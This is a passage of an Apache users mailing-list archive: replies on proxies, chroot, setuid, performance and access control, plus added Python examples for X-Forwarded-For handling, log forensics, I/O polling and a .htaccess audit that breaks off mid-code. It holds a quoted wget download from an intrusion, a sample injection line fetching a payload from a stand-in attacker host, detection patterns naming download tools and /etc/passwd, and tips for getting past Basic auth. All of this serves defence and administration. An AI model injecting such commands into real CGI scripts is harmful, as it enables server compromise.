> are relying on REMOTE_ADDR so I don't want to ask them to change their 
> scripts...

Ah.  Is everything you're concerned about written in PHP?  If so,
perhaps PHP has some mechanism for running a bit of code before each
PHP file is loaded; I believe this is possible with mod_perl, for
example.  Maybe the PHP folks would have some useful ideas.

Otherwise it sounds like you're stuck writing a small Apache module,
or hiring somebody to write one for you.  Sounds like a hassle, but at
least a moderately interesting hassle.  :)

ScottG.

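
The trust rule from the 2008-12-15 X-Forwarded-For reply above (use the header only when the connection comes from your own proxy, then take the last address your proxy appended) and the "set it once before the application runs" idea from this thread, as one added example that is not from either thread: `client_ip` implements the rule, and `TrustedProxyMiddleware` applies it as WSGI middleware so code that reads REMOTE_ADDR keeps working unchanged. The proxy ranges and environ values are constructed. For a PHP deployment the equivalent hook is the `auto_prepend_file` ini setting.

```python
"""Deriving the real client address behind a proxy from X-Forwarded-For.

Added example, not from either thread. Only the TCP peer's address is
trustworthy on its own; X-Forwarded-For is believed only for the hops a
trusted proxy appended. Proxy ranges and sample environs are constructed.
"""
import ipaddress
from typing import Callable, Iterable, List, Optional


def _is_ip(addr: str) -> bool:
    try:
        ipaddress.ip_address(addr)
        return True
    except ValueError:
        return False


def client_ip(remote_addr: str, xff_header: Optional[str],
              trusted_proxies: Iterable[str]) -> str:
    """Walk X-Forwarded-For right to left, skipping trusted proxies; the first
    address that is not one of ours is the client. A direct connection from a
    non-proxy ignores the header entirely, so a client cannot spoof it."""
    trusted = [ipaddress.ip_network(n, strict=False) for n in trusted_proxies]

    def is_trusted(addr: str) -> bool:
        return _is_ip(addr) and any(ipaddress.ip_address(addr) in net for net in trusted)

    if not is_trusted(remote_addr):
        return remote_addr  # header was written by whoever connected: untrusted
    hops = [h.strip() for h in (xff_header or "").split(",") if h.strip()]
    candidate = remote_addr
    for hop in reversed(hops):
        if not _is_ip(hop):
            break  # malformed entry: keep the last good address
        candidate = hop
        if not is_trusted(hop):
            break  # first untrusted address from the right is the client
    return candidate


class TrustedProxyMiddleware:
    """Rewrites environ['REMOTE_ADDR'] once, before the application runs,
    so scripts that rely on REMOTE_ADDR need no change. The original peer
    address is kept under a separate key for logging."""

    def __init__(self, app: Callable, trusted_proxies: Iterable[str]):
        self._app = app
        self._trusted: List[str] = list(trusted_proxies)

    def __call__(self, environ: dict, start_response: Callable):
        peer = environ.get("REMOTE_ADDR", "")
        environ["proxy.peer_addr"] = peer  # assumption: key name chosen for the example
        environ["REMOTE_ADDR"] = client_ip(peer, environ.get("HTTP_X_FORWARDED_FOR"),
                                           self._trusted)
        return self._app(environ, start_response)


# Constructed configuration: the reverse proxies live in 10.0.0.0/8
TRUSTED_PROXIES = ["10.0.0.0/8"]

if __name__ == "__main__":
    print(client_ip("10.0.0.5", "198.51.100.1, 10.0.0.6", TRUSTED_PROXIES))
    print(client_ip("203.0.113.7", "198.51.100.1", TRUSTED_PROXIES))
```

The list of trusted ranges is the whole security of the scheme: anything not in it is treated as a client, and an address in it that is reachable by outsiders lets them choose their own REMOTE_ADDR.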



Re: [users@httpd] Chroot question.

2005-06-24 Thread Scott Gifford
"Gold, Samuel (Contractor)" <[EMAIL PROTECTED]> writes:

> Hey all,
>
> I have setup apache 1.3.33 on Solaris 9 in a chroot environment and just
> wanted to ask a simple question.  If there is a /proc directory in the jail
> should the apache processes be in the real root /proc directory or in the
> jail /proc directory.  This is the first time I have ever setup a chroot
> jail so I just want to be sure.  Sorry if this OT.

I wouldn't give your chroot'd Apache access to the real /proc unless
something required it.  If possible, I would just not put a /proc at
all.

ScottG.




Re: [EMAIL PROTECTED] Capturing IP.

2005-07-22 Thread Scott Gifford
Luis Croker <[EMAIL PROTECTED]> writes:

> I have an Apache web server (server-A) which Im using like a proxy with
> SSL, I mean...  I receive all connections and forward them to another  server
> (server-B). Everything  works fine. Now, we want to capture the source IP
> address of the connections on the server B

Use Via:

http://httpd.apache.org/docs/1.3/mod/mod_proxy.html#proxyvia

ScottG.




Re: [EMAIL PROTECTED] Multiple SSL servers behind one public ip

2005-08-26 Thread Scott Gifford
"Dan Carl" <[EMAIL PROTECTED]> writes:

[...]

> The way I understand it is that because of the nature of the SSL protocol
> you can only have one ssl site per IP.
> Is there no way around this?

You can run the two SSL servers on two different ports, then use a URL
like:

https://example.com:444/...

to refer to the server using the non-standard port.

Scott.




Re: [EMAIL PROTECTED] how to run a root programme from apache server

2005-09-01 Thread Scott Gifford
Arun Naik <[EMAIL PROTECTED]> writes:

> Hi,
> I have to run a program from apache server, whose owner is root. As apache
> server runs from user apache, it is not able to run the program ( owned by
> root). Is there any way out ?

Change the permissions on the file so Apache has permission to run it,
or make a copy with different permissions if you don't have control
over the original file.

If the program needs to run *as* root, it would need to be setuid,
which is very dangerous if not done with extraordinary care.

Scott.




Re: [EMAIL PROTECTED] how to run a root programme from apache server

2005-09-01 Thread Scott Gifford
Anatoly Pugachev <[EMAIL PROTECTED]> writes:

> On Thu, Sep 01, 2005 at 11:02:31AM -0400, Scott Gifford wrote:
> | Arun Naik <[EMAIL PROTECTED]> writes:
> | 
> | > Hi,
> | > I have to run a program from apache server, whose owner is root. As apache
> | > server runs from user apache, it is not able to run the program ( owned by
> | > root). Is there any way out ?
> | 
> | If the program needs to run *as* root, it would need to be setuid,
> | which is very dangerous if not done with extraordinary care.
>
> or you can try to use sudo with apache user set to NOPASSWD in
> sudoers and allowing to run only this command. default sudoers file
> have examples on this.

This is still very dangerous if not done with extraordinary care.

Scott.




Re: [EMAIL PROTECTED] Different security based on network interface

2005-09-13 Thread Scott Gifford
"AragonX" <[EMAIL PROTECTED]> writes:

[...]

> I know that mod_access and I think mod_security will allow me to do this
> but they do it based on IP address.  I'm afraid someone will spoof the IP
> addresses of the internal network to bypass this security measure.

The easiest way to do this is with a firewall.  Set up a firewall on
your external interface that blocks all packets claiming to be from
your internal interface.  Your OS should have a tool to do this
(iptables on modern Linux).  It's also smart to do this at your
perimeter router; since lots of random things use IP addresses as
access control it's wise to stop anything fishy before it gets into
your building.

Scott.




Re: [EMAIL PROTECTED] unwanted file upload

2005-09-19 Thread Scott Gifford
John Hammer <[EMAIL PROTECTED]> writes:

> I am relatively new to this so if this is not the correct forum I would 
> appreciate being pointed to the right place.
>
> Over the weekend I discovered an unwanted program running on my server. In 
> the error_log I found this entry:
>
>> --13:29:54--  http://www.ozdereklam.com/.xpl/dc.txt
>>=> `/tmp/dc.txt'
>> Resolving www.ozdereklam.com... 82.222.180.120
>> Connecting to www.ozdereklam.com[82.222.180.120]:80... connected.
>> HTTP request sent, awaiting response... 200 OK
>> Length: 943 [text/plain]
>> 
>> 0K   100%4.62 
>> KB/s
>> 
>> 13:29:55 (4.62 KB/s) - `/tmp/dc.txt' saved [943/943]
>> 
>
> Is this a problem that can be solved with Apache? How can I keep files from 
> being uploaded in this way (and I am not sure what that "way" is).

My best guess is that somebody has exploited a bug in one of your CGI
scripts in a way that allowed them to execute arbitrary code, and they
elected to have this arbitrary code download this dc.txt file, using
wget it looks like.  The solution is to find and fix your buggy CGI
program(s), or to disable executable content from Apache.

If you look in your access_log around the time of that error_log
entry, you can probably narrow down which programs might be allowing
this.

mod_security is supposed to be able to protect against some of these
attacks:

http://www.modsecurity.org/

but I haven't used it, and really the buggy programs should be fixed
anyways.  Still, it might help.

Good luck,

ScottG.


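Added example (not from the thread) of the access_log correlation suggested above: parse combined-format lines, keep the requests within a window of the error_log timestamp, and flag request targets that URL-decode to shell metacharacters, download tools or writes to /tmp, which is what a CGI parameter reaching a shell looks like. The log lines, the /cgi-bin/form.cgi name, the attacker host and the date are constructed for this example.

```python
import re
from datetime import datetime
from urllib.parse import unquote

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)

# Things a legitimate request target should never decode to, but which show
# up when a CGI parameter is being passed to a shell: command separators,
# download tools, traversal, writes to /tmp. Tune this list for your site.
SUSPICIOUS = re.compile(
    r'\b(wget|curl|fetch|lynx)\b|[;|`]|\$\(|/tmp/|\.\./|/etc/passwd|[\r\n]',
    re.IGNORECASE,
)


def parse_apache_time(text):
    """Parse a %t value such as 18/Sep/2005:13:29:53 -0400, dropping the offset
    (error_log timestamps on the same box are in the same local time)."""
    return datetime.strptime(text.split(" ")[0], "%d/%b/%Y:%H:%M:%S")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = parse_apache_time(rec["ts"])
    return rec


def looks_suspicious(target):
    """Decode the target twice (catches %2527-style double encoding) and test it."""
    return bool(SUSPICIOUS.search(unquote(unquote(target))))


def requests_near(lines, when, window=60):
    """Requests within +/- window seconds of `when` (datetime or %t string),
    oldest first, each with a 'suspicious' flag."""
    if isinstance(when, str):
        when = parse_apache_time(when)
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if abs((rec["ts"] - when).total_seconds()) <= window:
            rec["suspicious"] = looks_suspicious(rec["target"])
            hits.append(rec)
    return sorted(hits, key=lambda r: r["ts"])


# Constructed sample access_log, not from the original post. The second line
# is what a command-injection attempt against a hypothetical form.cgi looks
# like: the parameter carries ";wget ... -O /tmp/dc.txt".
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [18/Sep/2005:13:29:01 -0400] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.23 - - [18/Sep/2005:13:29:53 -0400] "GET /cgi-bin/form.cgi?name=x;wget%20http://attacker.example.net/dc.txt%20-O%20/tmp/dc.txt HTTP/1.0" 200 0 "-" "Mozilla/4.0"
203.0.113.5 - - [18/Sep/2005:13:31:10 -0400] "GET /images/logo.gif HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
"""

if __name__ == "__main__":
    # 13:29:54 is the time of the wget transfer in the posted error_log
    # excerpt; the date is assumed for the example.
    for rec in requests_near(SAMPLE_ACCESS_LOG.splitlines(), "18/Sep/2005:13:29:54", window=30):
        flag = "SUSPICIOUS" if rec["suspicious"] else "ok"
        print(flag, rec["ts"], rec["ip"], rec["target"])
```

On a real incident, feed the whole access_log in and widen the window; the flagged script is the one to fix (or disable), and every other request from the same source address in the log is worth reading too.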


Re: [EMAIL PROTECTED] Apache running with PID of 0

2005-10-04 Thread Scott Gifford
"Duncan Drury" <[EMAIL PROTECTED]> writes:

[...]

> one of the symptoms is Apache ends up running with a PID of 0 (or
> shows up as doing so when I ps -aux | grep httpd)

Can you paste the output of "ps -aux |head -1" and "ps -aux |grep
httpd" which shows this into an email back to the list?

Unless FreeBSD uses PID 0 for something unusual, having that PID would
have to be a kernel bug.  Unfortunately I don't know FreeBSD that
well; maybe somebody on one of the FreeBSD mailing lists could explain
it.

Scott.




Re: [EMAIL PROTECTED] Re: PerlSetEnv in .htaccess ?

2008-01-23 Thread Scott Gifford
"abhishek jain" <[EMAIL PROTECTED]> writes:

> Pl. do not mind i am posting again within an hour, but the problem is taking 
> my
> nerves, is there a way to go forward i believe the webhost is not allowing to
> set me PerlSetEnv is there another method to do the same,

You could try just using SetEnv.

You could also edit your scripts to begin with:

$ENV{EMBPERL_OBJECT_BASE}='_base.epl'

Are you using mod_perl or standard CGI scripts?

There might be a better way supported by your Web hosting provider;
you could ask them for their suggestions.

Good luck!

Scott.




Re: [EMAIL PROTECTED] Re: PerlSetEnv in .htaccess ?

2008-01-23 Thread Scott Gifford
"abhishek jain" <[EMAIL PROTECTED]> writes:

> On second thoughts is there a method by which i can execute some
> piece of code to execute even before my scripts are called, remember
> i am on a shared host,

I don't know of a way to do exactly this on a shared host.  If your
provider supports mod_perl they must support things like PerlSetEnv,
you really should talk to them and see what they say.

Setting the environment variable in a BEGIN block of your Perl code
might be enough to work, though.

Good luck,

Scott.




Re: [EMAIL PROTECTED] Cannot access "localhost"

2008-03-07 Thread Scott Gifford
Ben Schonle <[EMAIL PROTECTED]> writes:

> *In Short:
> - After fresh installation of apache2 trying to access localhost or
> 127.0.0.1 is not working

Hi Ben,

What error do you get when you try to connect?  What happens if you
type "telnet 127.0.0.1 80" on the Web server to connect directly?

Scott.




Re: [EMAIL PROTECTED] About ListenBackLog and MinspareThread

2008-03-18 Thread Scott Gifford
"Arnab Ganguly" <[EMAIL PROTECTED]> writes:

> Hi All,
> My Apache server is heavily loaded. I am using Apache 2.2.8 on Red-Hat 3 with
> MPM=worker. Can I reduce the load by reducing the value of
> ListenBackLog?

No, at best that will save you a small amount of memory in your TCP
stack, at worst it will cause you to lose connections.

> What is the impact on the webserver if I keep MinSpareThread 1?

This is likely to hurt performance in most cases.  Apache keeps spare
threads around so they will be ready as soon as a request comes in.
The lower MinSpareThread is, the more likely it will have to create a
new thread for a new client, which is expensive.

Scott.




Re: [EMAIL PROTECTED] Prefetch

2008-03-20 Thread Scott Gifford
"Krist van Besien" <[EMAIL PROTECTED]> writes:

[...]

> What I now want to do, is have apache (or something else) look at the
> content of the response that comes from the backend, and _prefetch_
> all the images that are linked in it, so that when the request for the
> images comes they are already cached.
>
> Any ideas, modules or products that could help here?

That's an interesting idea.  I have written mod_perl code to modify a
Web page on the way through, to rewrite links to a new location.  It
went something like this in httpd.conf:


  PerlModule Apache::SiteMoved
  PerlModule Apache::Filter
  SetHandler perl-script
  PerlSetVar Filter On
  PerlHandler Apache::SiteMoved


and like this in lib/perl5/Apache/SiteMoved.pm:

package Apache::SiteMoved;

use strict;
use warnings;
use Apache::Constants qw(:common :response);

# mod_perl 1.x handler used as an Apache::Filter stage: reads the output of
# the previous stage line by line and rewrites the old host names before
# passing it on to the client.
sub handler
{
    my $r = shift;

    # Join the filter chain; deterministic(1) tells Apache::Filter the
    # output depends only on the input, so it may cache it.
    $r = $r->filter_register();
    $r->deterministic(1);

    my ($fh, $status) = $r->filter_input(); # Get status information
    return $status unless $status == OK;
    while (<$fh>)
    {
        s/(?:www\.)?old-site-name\.(?:com|net|org)/www.new-site-name.com/g;
        print;
    }
    return $status;
}

1;  # a module file must return true

If you could hook up a filter like this in the proxy, it could parse
the HTML, find IMG SRC commands, then fork off to a background process
to get them and put them in the cache (the easiest way would be to
just send requests for them to the Web server).

Hope that helps get you started,

-Scott.




Re: [EMAIL PROTECTED] Is it possible to keep a module running after closing a connection?

2008-03-31 Thread Scott Gifford
"Brown Chris-CCB034" <[EMAIL PROTECTED]> writes:

> I'm looking at a situation where we'd want to close a connection (for example
> the message size is too large) but we'd like to keep the thread active so that
> we can perform some other steps before releasing the thread.  Is this 
> possible?
>   I've been looking through the apache header files and nothing stands out to
> me as a method that would immediately close the connection without releasing
> the thread.

In the process model, you just fork() twice and continue your work in
the grandchild process.  Not sure with the threaded model, but
probably you could just create another thread to do your work, and set
it up to not require joining.

Scott.




Re: [EMAIL PROTECTED] Unsecuring a URL

2008-05-30 Thread Scott Gifford
Mark Mcdonald <[EMAIL PROTECTED]> writes:

[...]

> There are no errors, the authentication prompt just remains after apache is 
> restarted.
>
> I am testing on a box using Basic auth, with the following file in 
> /etc/apache2/sites-enabled:
>
> 

[...]

> 
> Order allow,deny
> Allow from any
> Satisfy any
> 

[...]

The problem may be that Apache is rewriting /node/feed to
/index.php?q=node/feed, so your Location rule above is getting ignored.
You could try
"Location /index.php?q=node/feed", but I doubt that will work; I don't
think you can set different rules depending on the query part of a
URL.

A few ideas: mod_rewrite can match these sorts of URLs and set
environment variables.  You might be able to trick later parts of
Apache into allowing you in, for example by overriding REMOTE_USER or
AUTH_TYPE.  If you allow one host, like 127.0.0.1, maybe you could
override REMOTE_HOST, or REMOTE_ADDR.  If 127.0.0.1 is allowed, you
could also try rewriting with the [P] option which will proxy the
request, and simply proxy it back to yourself at localhost.  The proxy
request will come from 127.0.0.1, and so should be allowed.

You could write a very simple authentication module that would run
before basic auth, and always authenticate users using this URL.
Otherwise it would decline the auth and let basic auth handle it.

You could write a small proxy or CGI program at a different,
unauthenticated URL to access this page (by running the script
directly, or by accessing it over HTTP in a way that your Web server
will allow).

You could also try asking in a Drupal forum.  I suspect their answer
will be to use Drupal's authentication instead of Apache; then you can
simply allow anonymous access to this page with a checkbox.

Good luck!

-Scott.




Re: [EMAIL PROTECTED] Re: Apache Security Problem

2008-05-30 Thread Scott Gifford
Andre Hübner <[EMAIL PROTECTED]> writes:

> Hi,
>
>>> You can do restrictions of particular options using the technique
> >>> shown here:
> >>> http://httpd.apache.org/docs/2.2/howto/htaccess.html#how
>
>>>But I have a feeling that there are other ways around your separation.
>>>It depends on exactly the details of how you are running your scripts.
>
>>> Joshua.
>
> I only can repeat. The way how to create the symlink is
> irrelevant. With Scriptingtechniques no reading of the files of other
> user is possible. (openbasedir/permission denied etc.) 

On most Apache configurations, a script written by any user can read
any files that Apache can read.  It runs as the Apache user (usually
apache or httpd), and can read any files accessible to that user.

If you're running something like suEXEC, though, you're right that the
symlinks will be accessed with a different user than scripts, and
could provide access to files they would not otherwise have access to.
Hopefully one of the other suggestions in this thread has allowed you
to restrict symlink following without breaking your .htaccess files.

Good luck!

-Scott.




Re: [EMAIL PROTECTED] Heavy Wait on My Shoulders

2008-05-30 Thread Scott Gifford
amiribarksdale <[EMAIL PROTECTED]> writes:

> About the only strange thing in my debug-level error logs is 
>
> (32)Broken pipe: client stopped connection before rwrite completed

That's an interesting clue. It looks like it is in the middle of a URL
rewrite (mod_rewrite) while it is stuck.  Maybe that's where the
problem is.  You can try turning on the RewriteLog and see what's up.

Scott.




Re: [EMAIL PROTECTED] Heavy Wait on My Shoulders

2008-05-30 Thread Scott Gifford
"Ben Ricker" <[EMAIL PROTECTED]> writes:

> If I remember his previous email, he said that he saw this after he
> his the 'Reload' button which would explain it.

It seems to me that you would have to hit Reload very fast to catch
Apache in the middle of a mod_rewrite, unless the rewrite was very
slow or looping.

Scott.


>
> Ben
>
> On Fri, May 30, 2008 at 9:53 AM, Scott Gifford
> <[EMAIL PROTECTED]> wrote:
>> amiribarksdale <[EMAIL PROTECTED]> writes:
>>
>>> About the only strange thing in my debug-level error logs is
>>>
>>> (32)Broken pipe: client stopped connection before rwrite completed
>>
>> That's an interesting clue. It looks like it is in the middle of a URL
>> rewrite (mod_rewrite) while it is stuck.  Maybe that's where the
>> problem is.  You can try turning on the RewriteLog and see what's up.
>>
>> Scott.
>>
>
>
>
> -- 
> Thanks,
>
> Ben Ricker
>
> --
>
> I use my cat's name for a password: he is called [EMAIL PROTECTED] and I
> change his name every 60 days.
>




Re: [EMAIL PROTECTED] IP based virtual hosting and security

2008-07-23 Thread Scott Gifford
"César Leonardo Blum Silveira" <[EMAIL PROTECTED]> writes:

[...]

> So, my question is: how safe is it to let the other interface listen,
> even if it will not respond correctly to any request? What is the
> potential for security vulnerabilities in the 8080 port of the other
> interface?

The actual threat from doing this is very small if both IP addresses
are publicly accessible.  Connecting to an address with no site
configured for it will probably exercise a different code path than
connecting to an address with a site, but it's likely to be small and
not very risky.

However, if your Web server is not public, or you are doing any kind
of IP address-based access control (perhaps at a firewall), you would
want to be careful to ensure that the same access rules applied to
both of your IP addresses.  Any public Web server represents some
risk, and if that alternate IP address bypasses your access control
and makes your otherwise private Web server public, it could be a bit
risky.

Bottom line: It's probably very slightly safer to avoid listening on
that IP address at all, but only very slightly.

Hope this helps,

Scott.




Re: [us...@httpd] graceful restart occasionally gives "could not bind" error

2010-05-27 Thread Scott Gifford
I don't have an answer for you, but here are a few troubleshooting tips I
have found helpful.

If you can make it happen pretty often, you could try doing an
strace/truss/ktrace (I think it's ktrace on BSD) of the process to see what
system calls it's making and exactly which is failing.  You could also try
running "netstat -an |grep :443" right before and after you run it to see if
there's anything else listening on port 443.

One possibility is that the SO_REUSEADDR socket option somehow isn't being
set, which would be visible in a trace.

Another possibility may be that a child process is doing something with the
socket that prevents it from being closed.  You could look in the logs
between restarts and see if that gives a clue.  Maybe there's one script
that is triggering this, for example.  If you tried a graceful restart every
minute or less, the log interval might be small enough to give you useful
information.

You could also try systematically disabling things and see if that helps,
starting with any modules that aren't used.

I have had similar problems on earlier versions of Apache but was never able
to figure them out.  They would only happen once or twice a year, so I
wasn't able to do much troubleshooting.  I know that doesn't help, but maybe
it's nice to know that you're not the only one who has seen problems like
this.

Hope this helps!

-Scott.


On Thu, May 27, 2010 at 10:17 AM, Jeff Trawick  wrote:

> On Wed, May 26, 2010 at 9:22 AM, Raphael Bauduin 
> wrote:
> > Hi,
> >
> > With an apache 2.2 running on FreeBSD
>
> which level of Apache? (2.2.9 had a change in this area of processing)
> which level of FreeBSD?
>
> >, I occasionally get a
> problem
> > with a graceful restart.
> > Issuing the command apachectl graceful results in these messages in
> > the error log:
> >
> > [Wed May 26 14:45:48 2010] [notice] Graceful restart requested, doing
> restart
> > [Wed May 26 14:45:53 2010] [warn] module dav_module is already loaded,
> skipping
> > [Wed May 26 14:45:53 2010] [crit] (22)Invalid argument: make_sock: for
> > address [::]:443, apr_socket_opt_set: (IPV6_V6ONLY)
> > (48)Address already in use: make_sock: could not bind to address
> 0.0.0.0:443
> > no listening sockets available, shutting down
>
> hmmm...  dunno why setting that socket option is failing (the first
> [crit] message)
>
> if you don't need IPv6, change your Listen directive from "Listen 443"
> to "Listen 0.0.0.0:443" to work around the problem, whatever it is
>
>
> >
> > or this
> >
> > [Wed May 26 15:02:52 2010] [notice] Graceful restart requested, doing
> restart
> > [Wed May 26 15:02:57 2010] [warn] module dav_module is already loaded,
> skipping
> > (48)Address already in use: make_sock: could not bind to address [::]:443
> >
> >
> >
> > This error is not systematic, but it makes the command unreliable and
> > unusable in a cron task.
> >
> > Any hint as to what causes this problem?
> >
> > Thanks in advance!
> >
> > Raph
> >
> >
> >
> > --
> > Web database: http://www.myowndb.com
> > Free Software Developers Meeting: http://www.fosdem.org
> >
>
>
>
> --
> Born in Roswell... married an alien...
>


Re: [us...@httpd] I/O accounting for all processes?

2010-06-15 Thread Scott Gifford
On Tue, Jun 15, 2010 at 5:33 PM, Jakov Sosic  wrote:

> I'm interested in measuring I/O that all apache processes are
> generating.


I used mod_logio to solve a similar problem not too long ago, with good
success:

http://httpd.apache.org/docs/2.0/mod/mod_logio.html


Scott.


Re: [us...@httpd] Apache getting stuck with all workers in a BUSY_READ state

2010-06-15 Thread Scott Gifford
On Tue, Jun 15, 2010 at 1:02 PM, David Fallon  wrote:
[ ... ]

> Any suggestions on a solution, or how I might get more info out of
> apache as to what it's doing while everyone's in the read state?


I would try using strace (or ktrace or truss depending on your OS) on the
processes to see what they are doing.  Between that and lsof you should be
able to tell what the process is blocked reading.

Hope this is helpful,

Scott.


Re: [us...@httpd] Apache getting stuck with all workers in a BUSY_READ state

2010-06-16 Thread Scott Gifford
On Wed, Jun 16, 2010 at 9:33 AM, David Fallon  wrote:

> Thanks for the suggestion, but unfortunately I've tried that - truss
> in this case is attaching post whatever it's blocking on (so I just
> see it sleeping), and I haven't yet waited out the problem to see what
> happens when/if whatever's blocking times out. Any other ideas?
>

truss reports nothing?  Not that it's waiting in a blocking operation?  On
the systems I'm familiar with at least, that means it's not waiting for I/O,
but is off doing something else.  That would indicate it's not waiting for a
proxy response or a user request, but something else altogether.  I'm not
sure what your system is, so its truss may behave differently, you could do
some quick experiments if you're not sure either.

The suggestion to take a look in a debugger is a good one if your Apache has
debugging symbols.  That may be a good next step.

Good luck!

-Scott.


Re: [us...@httpd] I/O accounting for all processes?

2010-06-16 Thread Scott Gifford
On Wed, Jun 16, 2010 at 12:16 PM, Jakov Sosic  wrote:

> On 06/16/2010 06:49 AM, Scott Gifford wrote:
> > On Tue, Jun 15, 2010 at 5:33 PM, Jakov Sosic wrote:
> >
> > I'm interested in measuring I/O that all apache processes are
> > generating.
> >
> >
> > I used mod_logio to solve a similar problem not too long ago, with good
> > success:
>
> But it seems that this module records network I/O and not the filesystem
> I/O. Although it's good to know this too, I would prefer more the
> filesystem I/O currently :)
>

Ah, I see.  I haven't done that before, but I can offer random suggestions.
 :-)

You probably know this already, but if Apache is the main or only thing
running on this server, tools like iostat and sar can get the information
you are after on a system-wide basis.  That would be by far the easiest
solution.

Otherwise, if you need to isolate Apache from other parts of the system, it
looks like the information you are after is in /proc/PID/io on Linux.  You
could find all of Apache's PIDs, poll this information periodically, log it,
then calculate usage/second over your log interval.  Tools like mrtg are
designed to manage this sort of data.  iotop might be helpful too.  You
could probably also install some custom request handlers from a module or
mod_perl (in a PerlLogHandler
<http://perl.apache.org/docs/2.0/user/handlers/http.html#PerlLogHandler> or
PerlCleanupHandler
<http://perl.apache.org/docs/2.0/user/handlers/http.html#PerlCleanupHandler>)
to read this file and record the I/O increase after every request.  This
might help work around your concern about PIDs changing.

Those are the places I would start at least.  Hope this is helpful,

-Scott.

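Added example, not part of the thread, of the /proc/PID/io polling approach described above: find the httpd processes, snapshot their counters, and turn the difference into a per-second rate. It assumes Linux, process names httpd or apache2, and that the poller runs as the web server user or root (/proc/PID/io is mode 0400). The io sample text is constructed.

```python
import os
import time

# Counters in /proc/<pid>/io worth tracking. rchar/wchar count bytes passed
# through read()/write() (sockets and page-cache hits included);
# read_bytes/write_bytes count what actually reached the block layer.
IO_FIELDS = ("rchar", "wchar", "read_bytes", "write_bytes")


def parse_proc_io(text):
    """Parse the 'name: value' lines of /proc/<pid>/io into ints."""
    counters = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip() in IO_FIELDS:
            counters[key.strip()] = int(value)
    return counters


def httpd_pids(proc="/proc", names=("httpd", "apache2")):
    """PIDs whose /proc/<pid>/comm is one of names (process names assumed)."""
    pids = []
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc, entry, "comm")) as f:
                if f.read().strip() in names:
                    pids.append(int(entry))
        except OSError:
            continue  # process exited between listdir() and open()
    return pids


def snapshot(pids, proc="/proc"):
    """Per-PID counters; unreadable (other user) or vanished PIDs are skipped."""
    per_pid = {}
    for pid in pids:
        try:
            with open(os.path.join(proc, str(pid), "io")) as f:
                per_pid[pid] = parse_proc_io(f.read())
        except OSError:
            continue
    return per_pid


def io_rate(before, after, seconds):
    """Bytes/second summed over PIDs present in both snapshots.

    Children that exited in between take their counters with them, and
    children started in between have no baseline, so a short interval
    with a low MaxRequestsPerChild undercounts. Recording the delta per
    request from a logging-phase handler, as suggested above, avoids that.
    """
    rate = dict.fromkeys(IO_FIELDS, 0.0)
    for pid, a in after.items():
        b = before.get(pid)
        if b is None:
            continue
        for k in IO_FIELDS:
            rate[k] += (a.get(k, 0) - b.get(k, 0)) / seconds
    return rate


# Constructed sample of one /proc/<pid>/io file, for the demonstration.
SAMPLE_IO = (
    "rchar: 1000\nwchar: 500\nsyscr: 10\nsyscw: 5\n"
    "read_bytes: 4096\nwrite_bytes: 8192\ncancelled_write_bytes: 0\n"
)

if __name__ == "__main__":
    interval = 10
    first = snapshot(httpd_pids())
    time.sleep(interval)
    second = snapshot(httpd_pids())
    for k, v in io_rate(first, second, interval).items():
        print("%-12s %12.0f B/s" % (k, v))
```

Run it from cron or an mrtg/munin plugin and graph the four numbers; compare write_bytes against what the access logs alone would predict to see whether the application, not the logging, is what hits the disk.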

Re: [us...@httpd] AllowOverride: Pros and Cons

2010-07-07 Thread Scott Gifford
On Thu, Jul 8, 2010 at 2:28 AM, James Corteciano wrote:
[ ... ]

> I am just concern about security matters that will produce if I will give
> the user full access on .htaccess (AllowOverride All) on their webroot?
>

AllowOverride All effectively allows a user who can create a .htaccess file
to access any file the Web server can read, and execute any code they would
like to as the Web server user.  From a security perspective it's equivalent
to giving the user a shell as the Web server user.  That may or may not be
consistent with your security objectives.

Hope this helps!

-Scott.

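Added example, not from either thread, of an audit a shared-hosting administrator might run over one customer's document root. It covers both the symlink problem from the "Apache Security Problem" thread (links that resolve outside the customer's own tree, readable through the web server user once FollowSymLinks is on) and the AllowOverride point above (.htaccess directives that turn "can write a file" into "can run code as the web server user"). The directive patterns, the sample .htaccess and the demo tree are constructed for this example.

```python
import os
import re
import tempfile

# .htaccess directives that make content executable or reach outside the
# tree. Illustrative; extend for the modules your server actually loads.
RISKY_DIRECTIVES = [
    (re.compile(r'^\s*Options\b.*(?<!-)\b(ExecCGI|FollowSymLinks|Includes)\b', re.I),
     "Options enables CGI, SSI or symlink following"),
    (re.compile(r'^\s*(AddHandler|SetHandler|AddType)\b.*\b(cgi-script|server-parsed|x-httpd-php)', re.I),
     "handler mapping makes uploaded content executable"),
    (re.compile(r'^\s*php_(admin_)?(value|flag)\s+(auto_prepend_file|auto_append_file|open_basedir|disable_functions)\b', re.I),
     "PHP override changes which code runs or where it may read"),
    (re.compile(r'^\s*RewriteRule\b.*\[[^\]]*\bP\b', re.I),
     "RewriteRule [P] turns the server into a proxy"),
]


def scan_htaccess(text):
    """(line number, reason, line) for each risky directive in a .htaccess body."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        for pattern, reason in RISKY_DIRECTIVES:
            if pattern.search(line):
                findings.append((lineno, reason, line.strip()))
                break
    return findings


def escaping_symlinks(root):
    """Symlinks under root whose resolved target lies outside root."""
    root_real = os.path.realpath(root)
    escaping = []
    for dirpath, dirnames, filenames in os.walk(root):  # does not descend into linked dirs
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            if os.path.commonpath([root_real, target]) != root_real:
                escaping.append((path, target))
    return escaping


def audit_webroot(root):
    """Run both checks over one customer's document root."""
    report = {"htaccess": [], "symlinks": escaping_symlinks(root)}
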